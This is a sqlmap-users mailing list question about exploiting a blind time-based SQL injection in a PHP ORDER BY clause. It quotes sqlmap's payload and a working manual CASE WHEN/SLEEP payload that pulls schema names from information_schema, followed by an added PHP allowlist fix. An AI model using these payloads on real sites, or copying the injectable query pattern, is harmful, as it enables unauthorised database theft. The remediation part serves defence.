Hello, all.
I'm trying to exploit the blind injection in the following query:
$var = $_GET['var'];
SELECT id,name FROM people ORDER BY $var
sqlmap finds the vulnerability, but it cannot be used.
sqlmap sends the following query:
name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/
IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND
1),SLEEP(5),561)
[22:20:36] [ERROR] unable to retrieve the number of databases
but it does not work. Some kind of filter may be interfering.
But my request in the browser URL:
index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM
/*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN
sleep(10) ELSE date END
It takes a successful ... How can I get sqlmap to use my method of attack
instead of the one it uses by default?
Sincerely, Kirill
P.S. Sorry for my bad English.
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
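
On the defensive side of the query in this post: ORDER BY takes an identifier, which cannot be bound as a prepared-statement parameter, so the value has to go through an allowlist. The following is an added example, not part of the original message or of sqlmap; the function names, the in-memory SQLite table (assumes pdo_sqlite) and the sample inputs are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: maps the request value to a fixed column name.
// The request string itself never becomes part of the SQL text.
function order_by_clause(?string $var, ?string $dir = null): string
{
    $sortable = ['id' => 'id', 'name' => 'name'];   // request key => column
    // Unknown or missing keys fall back to the default column, so an
    // expression-shaped value behaves exactly like an absent parameter.
    $column = $sortable[$var ?? ''] ?? 'id';
    $direction = strtoupper($dir ?? '') === 'DESC' ? 'DESC' : 'ASC';
    return "ORDER BY $column $direction";
}

// Hypothetical helper: the query from the post with the allowlisted clause.
function list_people(PDO $db, ?string $var, ?string $dir = null): array
{
    $sql = 'SELECT id, name FROM people ' . order_by_clause($var, $dir);
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE people (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO people (name) VALUES ('Zoe'), ('Adam'), ('Mia')");

// Constructed inputs: two legitimate sort keys and one expression-shaped value.
$inputs = ['name', 'id', 'CASE WHEN (1=1) THEN id ELSE name END'];
foreach ($inputs as $var) {
    $names = array_column(list_people($db, $var), 'name');
    printf("%-40s => %-18s | %s\n", $var, order_by_clause($var), implode(',', $names));
}
```

The third input produces the same clause and row order as the default sort, because only the two allowlisted column names can ever appear after ORDER BY.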